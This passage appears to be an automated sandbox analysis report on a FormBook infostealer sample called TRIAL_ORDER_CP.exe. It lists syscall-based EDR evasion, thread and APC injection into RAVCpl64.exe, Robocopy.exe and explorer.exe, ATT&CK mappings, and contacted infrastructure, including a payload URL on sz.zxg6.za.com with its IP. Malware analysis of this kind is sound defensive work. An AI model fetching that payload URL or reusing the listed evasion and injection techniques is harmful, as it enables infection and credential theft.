        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov ecx, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov ecx, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBF51B mov eax, dword ptr fs:[00000030h]3_2_33BBF51B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B9C51D mov eax, dword ptr fs:[00000030h]3_2_33B9C51D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]3_2_33B31514
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]3_2_33B31514
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]3_2_33B31514
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]3_2_33B31514
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]3_2_33B31514

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x47428DDJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x4742954Jump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeNtClose: Indirect: 0x3380F5FE
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFBD8CE2651Jump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeNtSetContextThread: Indirect: 0x33813819Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x474270EJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFBA5959E7F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeNtQueueApcThread: Indirect: 0x3380F56AJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeNtResumeThread: Indirect: 0x33813E59Jump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeNtSuspendThread: Indirect: 0x33813B39Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x474A4BBJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: NULL target: C:\Windows\SysWOW64\Robocopy.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeThread register set: target process: 5968Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeThread register set: target process: 5968Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		OS Credential Dumping121
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture12
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500398 Sample: TRIAL_ORDER_CP.exe Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 34 sz.zxg6.za.com 2->34 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 3 other signatures 2->46 10 TRIAL_ORDER_CP.exe 1 39 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 10->26 dropped 28 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 10->28 dropped 30 C:\Users\user\AppData\Local\...\UserInfo.dll, PE32 10->30 dropped 32 2 other files (none is malicious) 10->32 dropped 54 Switches to a custom stack to bypass stack traces 10->54 14 TRIAL_ORDER_CP.exe 6 10->14         started        signatures6 process7 dnsIp8 36 sz.zxg6.za.com 38.242.218.41, 49865, 80 NATIXISUS United States 14->36 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Queues an APC in another process (thread injection) 14->60 62 Found direct / indirect Syscall (likely to bypass EDR) 14->62 18 RAVCpl64.exe 14->18 injected signatures9 process10 signatures11 38 Found direct / indirect Syscall (likely to bypass EDR) 18->38 21 Robocopy.exe 18->21         started        process12 signatures13 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Switches to a custom stack to bypass stack traces 21->52 24 explorer.exe 52 1 21->24 injected process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        TRIAL_ORDER_CP.exe26%ReversingLabsWin32.Trojan.Garf
        TRIAL_ORDER_CP.exe100%Joe Sandbox ML
        TRIAL_ORDER_CP.exe42%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\UserInfo.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsDialogs.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsExec.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://www.msn.com/en-us/news/crime/police-warn-aggressive-water-buffalo-has-been-on-the-loose-for-0%Avira URL Cloudsafe
        https://www.energy.gov/energysaver/why-energy-efficiency-matters0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.coC0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/realestate/i-m-an-economist-here-s-my-prediction-for-the-housing-mar0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ0%VirustotalBrowse
        https://www.cbsnews.com/news/saying-goodbye-to-young-sheldon/0%Avira URL Cloudsafe
        https://www.pollensense.com/0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/0%VirustotalBrowse
        https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_0%Avira URL Cloudsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%Avira URL Cloudsafe
        https://wns.windows.com/EXE.150%Avira URL Cloudsafe
        https://www.energy.gov/energysaver/why-energy-efficiency-matters0%VirustotalBrowse
        https://www.pollensense.com/0%VirustotalBrowse
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_0%VirustotalBrowse
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/0%Avira URL Cloudsafe
        https://excel.office.com0%Avira URL Cloudsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%VirustotalBrowse
        https://www.msn.com/en-us/health/wellness/actress-malinda-williams-recognized-for-films-like-soul-fo0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        https://wns.windows.com/EXE.150%VirustotalBrowse
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://powerpoint.office.comEM0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/0%VirustotalBrowse
        https://android.notify.windows.com/iOSB0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN80%Avira URL Cloudsafe
        https://aka.ms/odirm0%Avira URL Cloudsafe
        https://excel.office.com0%VirustotalBrowse
        http://sz.zxg6.za.com/.ex/ELFyaa85.bin0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOStore_8wec0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOSB0%VirustotalBrowse
        https://www.msn.com/en-us/weather/maps/airqualitystation/in-Washington%2CDistrict-of-Columbia?loc=ey0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-dark0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN80%VirustotalBrowse
        https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=6c321c39-81be-4f44-a39d-60680%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
        https://aka.ms/odirm0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-dark0%VirustotalBrowse
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
        https://youtu.be/1uIizdaJhMI0%Avira URL Cloudsafe
        https://www.msn.com/en-us/entertainment/news/the-best-big-bang-theory-episode-of-all-time-according-0%Avira URL Cloudsafe
        https://android.notify.wy0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.png0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/0%Avira URL Cloudsafe
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew0%VirustotalBrowse
        https://www.msn.com/en-us/news/politics/new-trump-indictment-loses-some-allegations-related-to-jan-60%Avira URL Cloudsafe
        https://api.msn.com:443/v1/news/Feed/Windows?$0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.svg0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/0%VirustotalBrowse
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
        https://youtu.be/1uIizdaJhMI0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-dark0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm0%Avira URL Cloudsafe
        https://www.msn.com/en-us/money/companies/another-popular-ice-cream-brand-files-for-chapter-11-bankr0%Avira URL Cloudsafe
        https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.png0%VirustotalBrowse
        https://www.msn.com/en-us/money/companies/elon-musk-s-strange-new-rule-for-x-employees-could-cause-t0%Avira URL Cloudsafe
        https://www.msn.com/en-us/play/games/idle-mining-0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOSyb3d8bbw0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-dark0%VirustotalBrowse
        https://www.msn.com/en-us/lifestyle/cleaning-and-organizing/the-common-household-ingredient-that-can0%Avira URL Cloudsafe
        http://sz.zxg6.za.com/.ex/ELFyaa85.binAwarTrowww.kapiextra.com/ELFyaa85.bin0%Avira URL Cloudsafe
        https://www.msn.com/en-us/entertainment/news/best-movies-now-on-netflix/ss-BB1qpNv80%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB80%Avira URL Cloudsafe
        https://word.office.com0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?=0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg0%Avira URL Cloudsafe
        https://www.msn.com/en-us/weather/maps/severeweather/in-Washington%2CDistrict-of-Columbia?loc=eyJsIj0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark0%Avira URL Cloudsafe
        http://www.foreca.com0%Avira URL Cloudsafe
        https://outlook.com0%Avira URL Cloudsafe
        https://www.msn.com/en-us/tv/news/c0%Avira URL Cloudsafe
        https://www.msn.com/e0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_TH_Y.svg0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC-dark0%Avira URL Cloudsafe
        https://www.msn.com/en-us/entertainment/news/the-28-most-dazzling-red-carpet-beauty-looks-ever/ss-AA0%Avira URL Cloudsafe
        https://www.msn.com/en-us/play/games/farm-merge-valley/cg-9nf2hg8fnlts0%Avira URL Cloudsafe
        https://wealthofgeeks.com/the-best-tv-anti-heroes/0%Avira URL Cloudsafe
        https://api.msn.com/v1/news/Feed/Windows?activityId=409F83E3643B46AFA5176A6D0817A617&timeOut=5000&oc0%Avira URL Cloudsafe
        https://www.msn.com/eP0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W33_Clea0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
        https://excel.office.comS0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOSXboxGamew0%Avira URL Cloudsafe
        https://www.msn.com/en-us/weather/forecast/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjoiV2FzaGlu0%Avira URL Cloudsafe
        https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
        https://www.msn.com/en-us/health/medical/the-slow-and-steady-growth-of-trilobites/ar-AA1lcBT30%Avira URL Cloudsafe
        https://www.msn.com/en-us/sports/motorsports/travis-kelce-buys-an-ownership-stake-in-a-racehorse-nam0%Avira URL Cloudsafe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRnR-dark0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppQ0%Avira URL Cloudsafe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.png0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        sz.zxg6.za.com
        		38.242.218.41
        		truefalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://sz.zxg6.za.com/.ex/ELFyaa85.binfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/crime/police-warn-aggressive-water-buffalo-has-been-on-the-loose-for-explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.coCexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.energy.gov/energysaver/why-energy-efficiency-mattersexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/realestate/i-m-an-economist-here-s-my-prediction-for-the-housing-marexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.cbsnews.com/news/saying-goodbye-to-young-sheldon/explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.pollensense.com/explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://wns.windows.com/EXE.15explorer.exe, 00000007.00000002.275198272389.000000000D5D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436916001.000000000D5D1000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://excel.office.comexplorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/health/wellness/actress-malinda-williams-recognized-for-films-like-soul-foexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDTRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000626000.00000020.00000001.01000000.0000000B.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.microexplorer.exe, 00000007.00000002.275186219956.0000000002960000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275193654796.0000000009C20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.272433570950.000000000AB90000.00000002.00000001.00040000.00000000.sdmpfalse
